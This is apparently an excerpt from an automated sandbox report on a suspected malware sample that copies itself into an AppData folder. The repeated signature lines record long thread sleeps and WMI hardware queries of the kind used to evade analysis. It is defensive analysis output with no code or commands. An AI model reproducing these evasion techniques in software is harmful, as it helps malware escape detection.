              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596454Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596329Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596204Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596079Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595954Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595829Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595708Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595579Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595454Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595329Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595204Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595079Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594954Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594840Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594719Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593990Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593860Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593735Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWindow / User API: threadDelayed 2432Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWindow / User API: threadDelayed 7339Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWindow / User API: threadDelayed 4443Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWindow / User API: threadDelayed 5372Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWindow / User API: threadDelayed 3881Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWindow / User API: threadDelayed 5830Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -28592453314249787s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599862s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599734s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599594s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599468s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599140s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599031s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598921s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598703s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598594s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598481s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598375s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598265s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598156s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598047s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597937s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597828s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597719s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597594s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597478s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597358s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597116s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -594890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -594781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -594672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -594562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -594452s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -594343s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep count: 33 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -30437127721620741s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 2672Thread sleep count: 4443 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 2672Thread sleep count: 5372 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599765s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599547s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599437s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599328s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599218s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -598890s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -598781s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -598666s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -598547s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -598224s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -598078s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597966s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597818s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597702s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597562s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597415s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597309s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597188s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597077s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -596953s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -596844s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -596718s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -596609s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -596500s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -596390s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -596281s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -596166s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -596049s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -595922s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -595812s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -595667s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -595547s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -595438s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -595313s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -595188s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -595063s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -594953s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -594844s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -594734s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -594609s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -594500s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -594391s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -594266s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -594155s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -594041s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -593923s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -593811s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -35971150943733603s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -599891s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -599563s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -599449s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -599344s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -599234s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -599125s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -599016s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -598907s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -598782s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -598672s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -598563s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -598428s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -598157s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -598018s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -597891s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -597767s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -597641s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -597525s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -597417s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -597297s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -597188s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -597063s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -596954s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -596829s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -596704s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -596579s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -596454s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -596329s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -596204s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -596079s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -595954s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -595829s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -595708s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -595579s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -595454s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -595329s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -595204s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -595079s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -594954s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -594840s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -594719s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -594610s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -594485s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -594360s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -594235s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -594110s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -593990s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -593860s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -593735s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
